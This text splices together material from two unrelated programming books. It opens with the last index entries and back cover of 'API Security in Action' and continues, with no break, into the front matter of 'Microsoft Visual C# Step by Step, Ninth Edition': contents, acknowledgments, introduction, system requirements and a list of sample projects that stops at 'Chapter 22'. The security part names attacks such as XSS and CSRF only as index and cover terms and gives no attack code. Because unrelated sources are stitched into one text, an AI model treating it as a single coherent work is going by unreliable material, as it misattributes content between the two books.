trust boundaries 17
Trusted Execution Environment (TEE) 482
Trusted Types 169
TrustManager array 443, 450
TrustManagerFactory 443
tryAcquire() method 67
two-factor authentication (2FA) 22
U
UDP (User Datagram Protocol) 65, 442
UDPTransport 461
UIDs (user IDs) 343, 350
UMA (User Managed Access) 224
unacceptable inputs 50
uniqueMember attribute 272
Universal Links 235
UNPROTECTED header 471
unwrap() method 447–448, 450–451
update() method 426
updateUnique method 44
URI field 407
uri.toASCIIString() method 305
URL class 312
user codes 513
User Datagram Protocol (UDP) 65, 442
user IDs (UIDs) 343, 350
User Managed Access (UMA) 224
user namespace 343
user requests 428–435
OAuth2 token exchange 431–435
phantom token pattern 429–431
UserController class 74, 76, 91, 113, 269, 404, 413
UserController.lookupPermissions method 306
user_id column 305
user_id field 277
UserInfo endpoint 260, 529
username attribute 316
username field 242
user_roles table 277–279, 305
users 268–273
adding new to Natter space 94–95
authenticating 75–77
determining user roles 279–280
Lightweight Directory Access Protocol (LDAP) groups 271–273
registering 74–75
users table 90, 269
V
validateToken method 123, 137
validation
capabilities 306–307
session cookies 123–125
signed JWTs 193–194
VARCHAR 491
verification URI 513
verification_uri_complete field 515
version control capabilities 23
virtual machines (VMs) 337
virtual private cloud (VPC) 423
virtual static groups 272
VirtualBox
Linux 534
MacOS 532–533
Windows 534
VMs (virtual machines) 337
volumeMounts section 417
VPC (virtual private cloud) 423
W
WAF (web application firewall) 10
web browsers, session cookie authentication in 102–108
calling Natter API from JavaScript 102–104
drawbacks of HTTP authentication 108
intercepting form submission 104
serving HTML from same origin 105–108
Web Ontology Language (OWL) 281
Web Storage
storing tokens in 163–166
XSS attacks on 167–169
WebAuthn 397
web-keys 312
wikis 23
window object 104
window.location.hash variable 312
window.referrer field 312
window.referrer variable 301–302
Windows
setting up Java and Maven on 525
setting up Kubernetes 534
Minikube 534
VirtualBox 534
wrap() method 447–449, 451
WWW-Authenticate challenge header 161
WWW-Authenticate header 89
X
x5c claim 409
x5c header 251
XACML (eXtensible Access-Control Markup Language) 290–291
X-Content-Type-Options header 57
X-CSRF-Token header 130, 136, 142, 160, 163, 166
X-Forwarded-Client-Cert header 407–408
X-Frame-Options header 57
XMLHttpRequest object 102
XOR operator 135
xor() method 504
XSS (cross-site scripting) attacks 54, 56, 168
exploiting 54–57
on Web Storage 167–169
preventing 57–58
X-XSS-Protection header 57
Z
zero trust networking 362
[Back-cover diagram: a mind map of "API security" topics (authentication, authorization, audit logging, encryption, rate-limiting; passwords, token-based authentication, cookies, macaroons, JWTs, certificates; identity-based access control with ACLs, roles, and ABAC; capabilities; OAuth2) alongside a table listing the attacks covered in the book (SQL injection, cross-site scripting, denial of service, dictionary attacks, privilege escalation, session fixation, CSRF, token theft, JWT algorithm mixup, malleability, auth code injection, confused deputy attacks, open redirects, SSRF, log forgery, replay attacks) and the chapter in which each appears.]
Neil Madden
ISBN: 978-1-61729-602-4
APIs control data sharing in every service, server, data store, and web client. Modern data-centric designs—including microservices and cloud-native applications—demand a comprehensive, multi-layered approach to security for both private and public-facing APIs.

API Security in Action teaches you how to create secure APIs for any situation. By following this hands-on guide you'll build a social network API while mastering techniques for flexible multi-user security, cloud key management, and lightweight cryptography. When you're done, you'll be able to create APIs that stand up to complex threat models and hostile environments.
What’s Inside
● Authentication
● Authorization
● Audit logging
● Rate limiting
● Encryption
For developers with experience building RESTful APIs.
Examples are in Java.
Neil Madden has in-depth knowledge of applied cryptography,
application security, and current API security technologies. He
holds a Ph.D. in Computer Science.
To download their free eBook in PDF, ePub, and Kindle formats,
owners of this book should visit
www.manning.com/books/api-security-in-action
$69.99 / Can $92.99 [INCLUDING eBOOK]
API Security IN ACTION
SOFTWARE DEVELOPMENT/SECURITY
MANNING
"A comprehensive guide to designing and implementing secure services. A must-read book for all API practitioners who manage security."
—Gilberto Taccari, Penta

"Anyone who wants an in-depth understanding of API security should read this."
—Bobby Lin, DBS Bank

"I highly recommend this book to those developing APIs."
—Jorge Bo, Naranja X

"The best comprehensive guide about API security I have read."
—Marc Roulleau, GIRO
Microsoft Visual C# Step by Step
Ninth Edition
John Sharp
Microsoft Visual C# Step by Step, Ninth Edition
Published with the authorization of Microsoft Corporation by: Pearson
Education, Inc.
Copyright © 2018 by Pearson Education, Inc.
All rights reserved. This publication is protected by copyright, and
permission must be obtained from the publisher prior to any prohibited
reproduction, storage in a retrieval system, or transmission in any form or by
any means, electronic, mechanical, photocopying, recording, or likewise. For
information regarding permissions, request forms, and the appropriate
contacts within the Pearson Education Global Rights & Permissions
Department, please visit www.pearsoned.com/permissions/. No patent
liability is assumed with respect to the use of the information contained
herein. Although every precaution has been taken in the preparation of this
book, the publisher and author assume no responsibility for errors or
omissions. Nor is any liability assumed for damages resulting from the use of
the information contained herein.
ISBN-13: 978-1-5093-0776-0
ISBN-10: 1-5093-0776-1
Library of Congress Control Number: 2018944197
1 18
Trademarks
Microsoft and the trademarks listed at http://www.microsoft.com on the
“Trademarks” webpage are trademarks of the Microsoft group of companies.
All other marks are property of their respective owners.
Warning and Disclaimer
Every effort has been made to make this book as complete and as accurate as
possible, but no warranty or fitness is implied. The information provided is
on an “as is” basis. The author, the publisher, and Microsoft Corporation
shall have neither liability nor responsibility to any person or entity with
respect to any loss or damages arising from the information contained in this
book.
Special Sales
For information about buying this title in bulk quantities, or for special sales
opportunities (which may include electronic versions; custom cover designs;
and content particular to your business, training goals, marketing focus, or
branding interests), please contact our corporate sales department at
[email protected] or (800) 382-3419.
For government sales inquiries, please contact
[email protected].
For questions about sales outside the U.S., please contact
[email protected].
Editor-in-Chief
Brett Bartow
Acquisitions Editor
Trina MacDonald
Development Editor
Rick Kughen
Managing Editor
Sandra Schroeder
Senior Project Editor
Tracey Croom
Copy Editor
Christopher Morris
Indexer
Erika Millen
Proofreader
Jeanine Furino
Technical Editor
David Franson
Editorial Assistant
Courtney Martin
Cover Designer
Twist Creative, Seattle
Compositor
codemantra
Contents at a Glance
Acknowledgments
About the Author
Introduction
PART I INTRODUCING MICROSOFT VISUAL C# AND
MICROSOFT VISUAL STUDIO 2017
CHAPTER 1 Welcome to C#
CHAPTER 2 Working with variables, operators, and expressions
CHAPTER 3 Writing methods and applying scope
CHAPTER 4 Using decision statements
CHAPTER 5 Using compound assignment and iteration statements
CHAPTER 6 Managing errors and exceptions
PART II UNDERSTANDING THE C# OBJECT MODEL
CHAPTER 7 Creating and managing classes and objects
CHAPTER 8 Understanding values and references
CHAPTER 9 Creating value types with enumerations and structures
CHAPTER 10 Using arrays
CHAPTER 11 Understanding parameter arrays
CHAPTER 12 Working with inheritance
CHAPTER 13 Creating interfaces and defining abstract classes
CHAPTER 14 Using garbage collection and resource management
PART III DEFINING EXTENSIBLE TYPES WITH C#
CHAPTER 15 Implementing properties to access fields
CHAPTER 16 Handling binary data and using indexers
CHAPTER 17 Introducing generics
CHAPTER 18 Using collections
CHAPTER 19 Enumerating collections
CHAPTER 20 Decoupling application logic and handling events
CHAPTER 21 Querying in-memory data by using query expressions
CHAPTER 22 Operator overloading
PART IV BUILDING UNIVERSAL WINDOWS PLATFORM
APPLICATIONS WITH C#
CHAPTER 23 Improving throughput by using tasks
CHAPTER 24 Improving response time by performing asynchronous
operations
CHAPTER 25 Implementing the user interface for a Universal Windows
Platform app
CHAPTER 26 Displaying and searching for data in a Universal Windows
Platform app
CHAPTER 27 Accessing a remote database from a Universal Windows
Platform app
Index
Contents
Acknowledgments
About the Author
Introduction
PART I INTRODUCING MICROSOFT VISUAL C# AND
MICROSOFT VISUAL STUDIO 2017
Chapter 1 Welcome to C#
Beginning programming with the Visual Studio 2017
environment
Writing your first program
Using namespaces
Creating a graphical application
Examining the Universal Windows Platform app
Adding code to the graphical application
Summary
Quick reference
Chapter 2 Working with variables, operators, and expressions
Understanding statements
Using identifiers
Identifying keywords
Using variables
Naming variables
Declaring variables
Specifying numeric values
Working with primitive data types
Unassigned local variables
Displaying primitive data type values
Using arithmetic operators
Operators and types
Examining arithmetic operators
Controlling precedence
Using associativity to evaluate expressions
Associativity and the assignment operator
Incrementing and decrementing variables
Prefix and postfix
Declaring implicitly typed local variables
Summary
Quick reference
Chapter 3 Writing methods and applying scope
Creating methods
Declaring a method
Returning data from a method
Using expression-bodied methods
Calling methods
Specifying the method call syntax
Returning multiple values from a method
Applying scope
Defining local scope
Defining class scope
Overloading methods
Writing methods
Refactoring code
Nesting methods
Using optional parameters and named arguments
Defining optional parameters
Passing named arguments
Resolving ambiguities with optional parameters and
named arguments
Summary
Quick reference
Chapter 4 Using decision statements
Declaring Boolean variables
Using Boolean operators
Understanding equality and relational operators
Understanding conditional logical operators
Short-circuiting
Summarizing operator precedence and associativity
Using if statements to make decisions
Understanding if statement syntax
Using blocks to group statements
Cascading if statements
Using switch statements
Understanding switch statement syntax
Following the switch statement rules
Summary
Quick reference
Chapter 5 Using compound assignment and iteration statements
Using compound assignment operators
Writing while statements
Writing for statements
Understanding for statement scope
Writing do statements
Summary
Quick reference
Chapter 6 Managing errors and exceptions
Coping with errors
Trying code and catching exceptions
Unhandled exceptions
Using multiple catch handlers
Catching multiple exceptions
Filtering exceptions
Propagating exceptions
Using checked and unchecked integer arithmetic
Writing checked statements
Writing checked expressions
Throwing exceptions
Using throw exceptions
Using a finally block
Summary
Quick reference
PART II UNDERSTANDING THE C# OBJECT MODEL
Chapter 7 Creating and managing classes and objects
Understanding classification
The purpose of encapsulation
Defining and using a class
Controlling accessibility
Working with constructors
Overloading constructors
Deconstructing an object
Understanding static methods and data
Creating a shared field
Creating a static field by using the const keyword
Understanding static classes
Static using statements
Anonymous classes
Summary
Quick reference
Chapter 8 Understanding values and references
Copying value type variables and classes
Understanding null values and nullable types
The null-conditional operator
Using nullable types
Understanding the properties of nullable types
Using ref and out parameters
Creating ref parameters
Creating out parameters
How computer memory is organized
Using the stack and the heap
The System.Object class
Boxing
Unboxing
Casting data safely
The is operator
The as operator
The switch statement revisited
Summary
Quick reference
Chapter 9 Creating value types with enumerations and structures
Working with enumerations
Declaring an enumeration
Using an enumeration
Choosing enumeration literal values
Choosing an enumeration’s underlying type
Working with structures
Declaring a structure
Understanding differences between structures and classes
Declaring structure variables
Understanding structure initialization
Copying structure variables
Summary
Quick reference
Chapter 10 Using arrays
Declaring and creating an array
Declaring array variables
Creating an array instance
Populating and using an array
Creating an implicitly typed array
Accessing an individual array element
Iterating through an array
Passing arrays as parameters and return values for a
method
Copying arrays
Using multidimensional arrays
Creating jagged arrays
Accessing arrays that contain value types
Summary
Quick reference
Chapter 11 Understanding parameter arrays
Overloading—a recap
Using array arguments
Declaring a params array
Using params object[]
Using a params array
Comparing parameter arrays and optional parameters
Summary
Quick reference
Chapter 12 Working with inheritance
What is inheritance?
Using inheritance
The System.Object class revisited
Calling base-class constructors
Assigning classes
Declaring new methods
Declaring virtual methods
Declaring override methods
Understanding protected access
Creating extension methods
Summary
Quick reference
Chapter 13 Creating interfaces and defining abstract classes
Understanding interfaces
Defining an interface
Implementing an interface
Referencing a class through its interface
Working with multiple interfaces
Explicitly implementing an interface
Interface restrictions
Defining and using interfaces
Abstract classes
Abstract methods
Sealed classes
Sealed methods
Implementing and using an abstract class
Summary
Quick reference
Chapter 14 Using garbage collection and resource management
The life and times of an object
Writing destructors
Why use the garbage collector?
How does the garbage collector work?
Recommendations
Resource management
Disposal methods
Exception-safe disposal
The using statement and the IDisposable interface
Calling the Dispose method from a destructor
Implementing exception-safe disposal
Summary
Quick reference
PART III DEFINING EXTENSIBLE TYPES WITH C#
Chapter 15 Implementing properties to access fields
Implementing encapsulation by using methods
What are properties?
Using properties
Read-only properties
Write-only properties
Property accessibility
Understanding the property restrictions
Declaring interface properties
Replacing methods with properties
Generating automatic properties
Initializing objects by using properties
Summary
Quick reference
Chapter 16 Handling binary data and using indexers
What is an indexer?
Storing binary values
Displaying binary values
Manipulating binary values
Solving the same problems using indexers
Understanding indexer accessors
Comparing indexers and arrays
Indexers in interfaces
Using indexers in a Windows application
Summary
Quick reference
Chapter 17 Introducing generics
The problem: Misusing the object type
The generics solution
Generics vs. generalized classes
Generics and constraints
Creating a generic class
The theory of binary trees
Building a binary tree class by using generics
Creating a generic method
Defining a generic method to build a binary tree
Variance and generic interfaces
Covariant interfaces
Contravariant interfaces
Summary
Quick reference
Chapter 18 Using collections
What are collection classes?
The List<T> collection class
The LinkedList<T> collection class
The Queue<T> collection class
The Stack<T> collection class
The Dictionary<TKey, TValue> collection class
The SortedList<TKey, TValue> collection class
The HashSet<T> collection class
Using collection initializers
The Find methods, predicates, and lambda expressions
The forms of lambda expressions
Comparing arrays and collections
Using collection classes to play cards
Summary
Quick reference
Chapter 19 Enumerating collections
Enumerating the elements in a collection
Manually implementing an enumerator
Implementing the IEnumerable interface
Implementing an enumerator by using an iterator
A simple iterator
Defining an enumerator for the Tree<TItem> class by
using an iterator
Summary
Quick reference
Chapter 20 Decoupling application logic and handling events
Understanding delegates
Examples of delegates in the .NET Framework class
library
The automated factory scenario
Implementing the factory control system without using
delegates
Implementing the factory by using a delegate
Declaring and using delegates
Lambda expressions and delegates
Creating a method adapter
Enabling notifications by using events
Declaring an event
Subscribing to an event
Unsubscribing from an event
Raising an event
Understanding user interface events
Using events
Summary
Quick reference
Chapter 21 Querying in-memory data by using query expressions
What is LINQ?
Using LINQ in a C# application
Selecting data
Filtering data
Ordering, grouping, and aggregating data
Joining data
Using query operators
Querying data in Tree<TItem> objects
LINQ and deferred evaluation
Summary
Quick reference
Chapter 22 Operator overloading
Understanding operators
Operator constraints
Overloaded operators
Creating symmetric operators
Understanding compound assignment evaluation
Declaring increment and decrement operators
Comparing operators in structures and classes
Defining operator pairs
Implementing operators
Understanding conversion operators
Providing built-in conversions
Implementing user-defined conversion operators
Creating symmetric operators, revisited
Writing conversion operators
Summary
Quick reference
PART IV BUILDING UNIVERSAL WINDOWS PLATFORM
APPLICATIONS WITH C#
Chapter 23 Improving throughput by using tasks
Why perform multitasking by using parallel processing?
The rise of the multicore processor
Implementing multitasking by using the Microsoft .NET
Framework
Tasks, threads, and the ThreadPool
Creating, running, and controlling tasks
Using the Task class to implement parallelism
Abstracting tasks by using the Parallel class
When not to use the Parallel class
Canceling tasks and handling exceptions
The mechanics of cooperative cancellation
Using continuations with canceled and faulted tasks
Summary
Quick reference
Chapter 24 Improving response time by performing asynchronous
operations
Implementing asynchronous methods
Defining asynchronous methods: The problem
Defining asynchronous methods: The solution
Defining asynchronous methods that return values
Asynchronous method gotchas
Asynchronous methods and the Windows Runtime APIs
Tasks, memory allocation, and efficiency
Using PLINQ to parallelize declarative data access
Using PLINQ to improve performance while iterating
through a collection
Canceling a PLINQ query
Synchronizing concurrent access to data
Locking data
Synchronization primitives for coordinating tasks
Canceling synchronization
The concurrent collection classes
Using a concurrent collection and a lock to implement
thread-safe data access
Summary
Quick reference
Chapter 25 Implementing the user interface for a Universal Windows
Platform app
Features of a Universal Windows Platform app
Using the Blank App template to build a Universal Windows
Platform app
Implementing a scalable user interface
Applying styles to a UI
Summary
Quick reference
Chapter 26 Displaying and searching for data in a Universal Windows
Platform app
Implementing the Model–View–ViewModel pattern
Displaying data by using data binding
Modifying data by using data binding
Using data binding with a ComboBox control
Creating a ViewModel
Adding commands to a ViewModel
Searching for data using Cortana
Providing a vocal response to voice commands
Summary
Quick reference
Chapter 27 Accessing a remote database from a Universal Windows
Platform app
Retrieving data from a database
Creating an entity model
Creating and using a REST web service
Inserting, updating, and deleting data through a REST web
service
Reporting errors and updating the UI
Summary
Quick reference
Index
Acknowledgments
Well, here we are again, in what appears to have become a biennial event;
such is the pace of change in the world of software development! As I glance
at my beloved first edition of Kernighan and Ritchie describing The C
Programming Language (Prentice Hall), I occasionally get nostalgic for the
old times. In those halcyon days, programming had a certain mystique, even
glamour. Nowadays, in one form or another, the ability to write at least a
little bit of code is fast becoming as much a requirement in many workplaces
as the ability to read, write, or add up. The romance has gone, to be replaced
by an air of “everyday-ness.” Then, as I start to hanker after the time when I
still had hair on my head and the corporate mainframe required a team of full-
time support staff just to pander to its whims, I realize that if programming
were restricted to a few elite souls, then the market for C# books would have
disappeared after the first couple of editions of this tome. Thus cheered, I
power up my laptop, my mind mocking the bygone era when such processing
power could have navigated many hundreds of Apollo spacecraft
simultaneously to the moon and back, and get down to work on the latest
edition of this book!
Despite the fact that my name is on the cover, authoring a book such as
this is far from a one-man project. I’d like to thank the following people who
have provided unstinting support and assistance throughout this exercise.
First, Trina MacDonald at Pearson Education, who took on the role of
prodding me into action and ever-so-gently tying me down to well-defined
deliverables and hand-off dates. Without her initial impetus and cajoling, this
project would not have got off the ground.
Next, Rick Kughen, the tireless copy editor who ensured that my grammar
remained at least semi-understandable, and picked up on the missing words
and nonsense phrases in the text.
Then, David Franson, who had the unenviable task of testing the code and
exercises. I know from experience that this can be a thankless and frustrating
task at times, but the hours spent and the feedback that results can only make
for a better book. Of course, any errors that remain are entirely my
responsibility, and I am happy to listen to feedback from any reader.
As ever, I must also thank Diana, my better half, who keeps me supplied
with caffeine-laden hot drinks when deadlines are running tight. Diana has
been long-suffering and patient, and has so far survived my struggle through
nine editions of this book; that is dedication well beyond the call of duty. She
has recently taken up running. I assumed it was to keep fit, but I think it is
more likely so she can get well away from the house and scream loudly
without my hearing her!
And lastly, to James and Frankie, who have both now flown the nest.
James is trying to avoid gaining a Yorkshire accent while living and working
in Sheffield, but Frankie has remained closer to home so she can pop in and
raid the kitchen from time to time.
About the Author
John Sharp is a principal technologist for CM Group Ltd, a software
development and consultancy company in the United Kingdom. He is well
versed as a software consultant, developer, author, and trainer, with more
than 35 years of experience, ranging from Pascal programming on CP/M and
C/Oracle application development on various flavors of UNIX to the design
of C# and JavaScript distributed applications and development on Windows
10 and Microsoft Azure. He also spends much of his time writing courseware
for Microsoft, focusing on areas such as Data Science using R and Python,
Big Data processing with Spark and CosmosDB, and scalable application
architecture with Azure.
Introduction
Microsoft Visual C# is a powerful but simple language aimed primarily at
developers who create applications built on the Microsoft .NET Framework.
Visual C# inherits many of the best features of C++ and Microsoft Visual
Basic but few of the inconsistencies and anachronisms, which results in a
cleaner and more logical language.
C# 1.0 made its public debut in 2001.
C# 2.0, with Visual Studio 2005, provided several important new
features, including generics, iterators, and anonymous methods.
C# 3.0, which was released with Visual Studio 2008, added extension
methods, lambda expressions, and most famously of all, the Language-
Integrated Query facility, or LINQ.
C# 4.0 was released in 2010 and provided further enhancements that
improved its interoperability with other languages and technologies.
These features included support for named and optional arguments and
the dynamic type, which indicates that the language runtime should
implement late binding for an object. An important addition to the
.NET Framework, and released concurrently with C# 4.0, were the
classes and types that constitute the Task Parallel Library (TPL). Using
the TPL, you can build highly scalable applications that can take full
advantage of multicore processors.
C# 5.0 added native support for asynchronous task-based processing
through the async method modifier and the await operator.
C# 6.0 was an incremental upgrade with features designed to make life
simpler for developers. These features include items such as string
interpolation (you need never use String.Format again!), enhancements
to the ways in which properties are implemented, expression-bodied
methods, and others.
C# 7.0 adds further enhancements to aid productivity and remove some
of the minor anachronisms of C#. For example, you can now
implement property accessors as expression-bodied members, methods
can return multiple values in the form of tuples, the use of out
parameters has been simplified, and switch statements have been
extended to support pattern- and type-matching. There are other
updates as well, which are covered in this book.
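As a brief taste of the newer features listed above, here is a short illustrative sketch (not one of the book's exercises) combining string interpolation, an expression-bodied method, tuples, an inline out variable, and a type-matching switch statement. Note that on the .NET Framework 4.6.1, the tuple syntax requires the System.ValueTuple NuGet package.

using System;
using System.Linq;

class FeatureTaster
{
    // An expression-bodied method (C# 6.0) that returns a tuple (C# 7.0)
    static (int min, int max) FindRange(int[] data) => (data.Min(), data.Max());

    static void Main()
    {
        // Inline out variable declaration (C# 7.0)
        if (int.TryParse("42", out int value))
        {
            // Tuple deconstruction (C# 7.0)
            var (min, max) = FindRange(new[] { value, 3, 7 });

            // String interpolation (C# 6.0)
            Console.WriteLine($"Range: {min} to {max}");
        }

        // Pattern matching in a switch statement (C# 7.0)
        object item = "hello";
        switch (item)
        {
            case int i when i > 0:
                Console.WriteLine($"Positive integer: {i}");
                break;
            case string s:
                Console.WriteLine($"A string of length {s.Length}");
                break;
            default:
                Console.WriteLine("Something else");
                break;
        }
    }
}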
It goes without saying that Microsoft Windows 10 is an important
platform for running C# applications, but now you can also run code
developed by using C# on other operating systems, such as Linux, through
the .NET Core runtime. This opens up possibilities for writing code that can
run in multiple environments. Additionally, Windows 10 supports highly
interactive applications that can share data and collaborate as well as connect
to services running in the cloud. The key notion in Windows 10 is Universal
Windows Platform (UWP) apps—applications designed to run on any
Windows 10 device, whether a fully fledged desktop system, a laptop, a
tablet, or even an IoT (Internet of Things) device with limited resources.
Once you have mastered the core features of C#, gaining the skills to build
applications that can run on all these platforms is important.
Voice activation is another feature that has come to the fore, and Windows
10 includes Cortana, your personal voice-activated digital assistant. You can
integrate your own apps with Cortana to allow them to participate in data
searches and other operations. Despite the complexity normally associated
with natural-language speech analysis, enabling your apps to respond to
Cortana’s requests is surprisingly easy; I cover this in Chapter 26. Also, the
cloud has become such an important element in the architecture of many
systems—ranging from large-scale enterprise applications to mobile apps
running on portable devices—that I decided to focus on this aspect of
development in the final chapter of the book.
The development environment provided by Visual Studio 2017 makes
these features easy to use, and the many new wizards and enhancements
included in the latest version of Visual Studio can greatly improve your
productivity as a developer. I hope you have as much fun working through
this book as I had writing it!
Who should read this book
This book assumes that you are a developer who wants to learn the
fundamentals of programming with C# by using Visual Studio 2017 and the
.NET Framework version 4.6.1. By the time you complete this book, you will
have a thorough understanding of C# and will have used it to build
responsive and scalable applications that can run on the Windows 10
operating system.
Who should not read this book
This book is aimed at developers new to C# but not completely new to
programming. As such, it concentrates primarily on the C# language. This
book is not intended to provide detailed coverage of the multitude of
technologies available for building enterprise-level and global applications
for Windows, such as ADO.NET, ASP.NET, Azure, or Windows
Communication Foundation. If you require more information on any of these
items, you might consider reading some of the other titles available from
Microsoft Press.
Organization of this book
This book is divided into four sections:
Part I, “Introducing Microsoft Visual C# and Microsoft Visual Studio
2017,” provides an introduction to the core syntax of the C# language
and the Visual Studio programming environment.
Part II, “Understanding the C# object model,” goes into detail on how
to create and manage new types in C# and how to manage the
resources referenced by these types.
Part III, “Defining extensible types with C#,” includes extended
coverage of the elements that C# provides for building types that you
can reuse across multiple applications.
Part IV, “Building Universal Windows Platform applications with C#,”
describes the universal Windows 10 programming model and how you
can use C# to build interactive applications for this model.
Finding your best starting point in this book
This book is designed to help you build skills in a number of essential areas.
You can use this book if you are new to programming or if you are switching
from another programming language such as C, C++, Java, or Visual Basic.
Use the following table to find your best starting point.
If you are
Follow these steps
New to object-oriented
programming
1. Install the practice files as described in the
upcoming section, “Code samples.”
2. Work through the chapters in Parts I, II, and
III sequentially.
3. Complete Part IV as your level of
experience and interest dictates.
Familiar with procedural
programming languages,
such as C, but new to C#
1. Install the practice files as described in the
upcoming section, “Code samples.”
2. Skim the first five chapters to get an
overview of C# and Visual Studio 2017, and
then concentrate on Chapters 6 through 22.
3. Complete Part IV as your level of
experience and interest dictates.
Migrating from an
object-oriented language
such as C++ or Java
1. Install the practice files as described in the
upcoming section, “Code samples.”
2. Skim the first seven chapters to get an
overview of C# and Visual Studio 2017, and
then concentrate on Chapters 8 through 22.
3. For information about building Universal
Windows Platform applications, read Part
IV.
Switching from Visual
Basic to C#
1. Install the practice files as described in the
upcoming section, “Code samples.”
2. Work through the chapters in Parts I, II, and
III sequentially.
3. For information about building Universal
Windows Platform applications, read Part
IV.
4. Read the Quick Reference sections at the
end of the chapters for information about
specific C# and Visual Studio 2017
constructs.
Referencing the book
after working through the
exercises
1. Use the index or the table of contents to find
information about particular subjects.
2. Read the Quick Reference sections at the
end of each chapter to find a brief review of
the syntax and techniques presented in the
chapter.
Most of the book’s chapters include hands-on samples that let you try out
the concepts you just learned. No matter which sections you choose to focus
on, be sure to download and install the sample applications on your system.
Conventions and features in this book
This book presents information by using conventions designed to make the
information readable and easy to follow.
Each exercise consists of a series of tasks, presented as numbered steps
(1, 2, and so on) listing each action you must take to complete the
exercise.
Boxed elements with labels such as “Note” provide additional
information or alternative methods for completing a step successfully.
Text that you type (apart from code blocks) appears in bold.
A plus sign (+) between two key names means that you must press
those keys at the same time. For example, “Press Alt+Tab” means that
you hold down the Alt key while you press the Tab key.
System requirements
You will need the following hardware and software to complete the practice
exercises in this book:
Windows 10 (Home, Professional, Education, or Enterprise) version
1507 or higher.
The most recent build of Visual Studio Community 2017, Visual
Studio Professional 2017, or Visual Studio Enterprise 2017 (make sure
that you have installed any updates). As a minimum, you should select
the following workloads when installing Visual Studio 2017:
• Universal Windows Platform development
• .NET desktop development
• ASP.NET and web development
• Azure development
• Data storage and processing
• .NET Core cross-platform development
Note All the exercises and code samples in this book have been
developed and tested using Visual Studio Community 2017. They
should all work, unchanged, in Visual Studio Professional 2017 and
Visual Studio Enterprise 2017.
A computer that has a 1.8 GHz or faster processor (dual-core or better
recommended)
2 GB RAM (4 GB RAM recommended, add 512 MB if running in a
virtual machine)
10 GB of available hard disk space after installing Visual Studio
5400 RPM hard-disk drive (SSD recommended)
A video card that supports a 1024 × 768 or higher resolution display
Internet connection to download software or chapter examples
Depending on your Windows configuration, you might require local
Administrator rights to install or configure Visual Studio 2017.
You also need to enable developer mode on your computer to be able to
create and run UWP apps. For details on how to do this, see “Enable Your
Device for Development,” at
https://msdn.microsoft.com/library/windows/apps/dn706236.aspx.
Code samples
Most of the chapters in this book include exercises with which you can
interactively try out new material learned in the main text. You can download
all the sample projects, in both their pre-exercise and post-exercise formats,
from the following page:
https://aka.ms/VisCSharp9e/downloads
Note In addition to the code samples, your system should have Visual
Studio 2017 installed. If available, install the latest service packs for
Windows and Visual Studio.
Installing the code samples
Follow these steps to install the code samples on your computer so that you
can use them with the exercises in this book:
1. Unzip the CSharpSBS.zip file that you downloaded from the book’s
website, extracting the files into your Documents folder.
2. If prompted, review the end-user license agreement. If you accept the
terms, select the Accept option and then click Next.
Note If the license agreement doesn’t appear, you can access it from the
same webpage from which you downloaded the CSharpSBS.zip file.
Using the code samples
Each chapter in this book explains when and how to use the code samples for
that chapter. When it’s time to use a code sample, the book will list the
instructions for how to open the files.
Important Many of the code samples depend on NuGet packages that
are not included with the code. These packages are downloaded
automatically the first time you build a project. As a result, if you open
a project and examine the code before doing a build, Visual Studio
might report a large number of errors for unresolved references.
Building the project will resolve these references, and the errors should
disappear.
For those of you who like to know all the details, here’s a list of the
sample Visual Studio 2017 projects and solutions, grouped by the folders in
which you can find them. In many cases, the exercises provide starter files
and completed versions of the same projects that you can use as a reference.
The completed projects for each chapter are stored in folders with the suffix
“- Complete.”
Project/Solution
Description
Chapter 1
TextHello
This project gets you started. It steps through
the creation of a simple program that displays
a text-based greeting.
Hello
This project opens a window that prompts the
user for his or her name and then displays a
greeting.
Chapter 2
PrimitiveDataTypes
This project demonstrates how to declare
variables by using each of the primitive types,
how to assign values to these variables, and
how to display their values in a window.
MathsOperators
This program introduces the arithmetic
operators (+ – * / %).
Chapter 3
Methods
In this project, you’ll reexamine the code in
the MathsOperators project and investigate
how it uses methods to structure the code.
DailyRate
This project walks you through writing your
own methods, running the methods, and
stepping through the method calls by using
the Visual Studio 2017 debugger.
DailyRate Using
Optional Parameters
This project shows you how to define a
method that takes optional parameters and
call the method by using named arguments.
Chapter 4
Selection
This project shows you how to use a
cascading if statement to implement complex
logic, such as comparing the equivalence of
two dates.
SwitchStatement
This simple program uses a switch statement
to convert characters into their XML
representations.
Chapter 5
WhileStatement
This project demonstrates a while statement
that reads the contents of a source file one
line at a time and displays each line in a text
box on a form.
DoStatement
This project uses a do statement to convert a
decimal number to its octal representation.
Chapter 6
MathsOperators
This project revisits the MathsOperators
project from Chapter 2 and shows how
various unhandled exceptions can make the
program fail. The try and catch keywords
then make the application more robust so that
it no longer fails.
Chapter 7
Classes
This project covers the basics of defining
your own classes, complete with public
constructors, methods, and private fields. It
also shows how to create class instances by
using the new keyword and how to define
static methods and fields.
Chapter 8
Parameters
This program investigates the difference
between value parameters and reference
parameters. It demonstrates how to use the ref
and out keywords.
Chapter 9
StructsAndEnums
This project defines a struct type to represent
a calendar date.
Chapter 10
Cards
This project shows how to use arrays to
model hands of cards in a card game.
Chapter 11
ParamsArray
This project demonstrates how to use the
params keyword to create a single method
that can accept any number of int arguments.
Chapter 12
Vehicles
This project creates a simple hierarchy of
vehicle classes by using inheritance. It also
demonstrates how to define a virtual method.
ExtensionMethod
This project shows how to create an extension
method for the int type, providing a method
that converts an integer value from base 10 to
a different number base.
Chapter 13
Drawing
This project implements part of a graphical
drawing package. The project uses interfaces
to define the methods that drawing shapes
expose and implement.
Chapter 14
GarbageCollectionDemo
This project shows how to implement exception-safe disposal of resources by using the Dispose pattern.
Chapter 15
Drawing Using
Properties
This project extends the application in the
Drawing project developed in Chapter 13 to
encapsulate data in a class by using
properties.
AutomaticProperties
This project shows how to create automatic
properties for a class and use them to
initialize instances of the class.
Chapter 16
Indexers
This project uses two indexers: one to look up
a person’s phone number when given a name
and the other to look up a person’s name
when given a phone number.
Chapter 17
BinaryTree
This solution shows you how to use generics
to build a type-safe structure that can contain
elements of any type.
BuildTree
This project demonstrates how to use generics
to implement a type-safe method that can take
parameters of any type.
Chapter 18
Cards
This project updates the code from Chapter
10 to show how to use collections to model
hands of cards in a card game.
Chapter 19
BinaryTree
This project shows you how to implement the
generic IEnumerator<T> interface to create
an enumerator for the generic Tree class.
IteratorBinaryTree
This solution uses an iterator to generate an
enumerator for the generic Tree class.
Chapter 20
Delegates
This project shows how to decouple a method
from the application logic that invokes it by
using a delegate. The project is then extended
to show how to use an event to alert an object
to a significant occurrence, and how to catch
an event and perform any processing
required.
Chapter 21
QueryBinaryTree
This project shows how to use LINQ queries
to retrieve data from a binary tree object.
Chapter 22
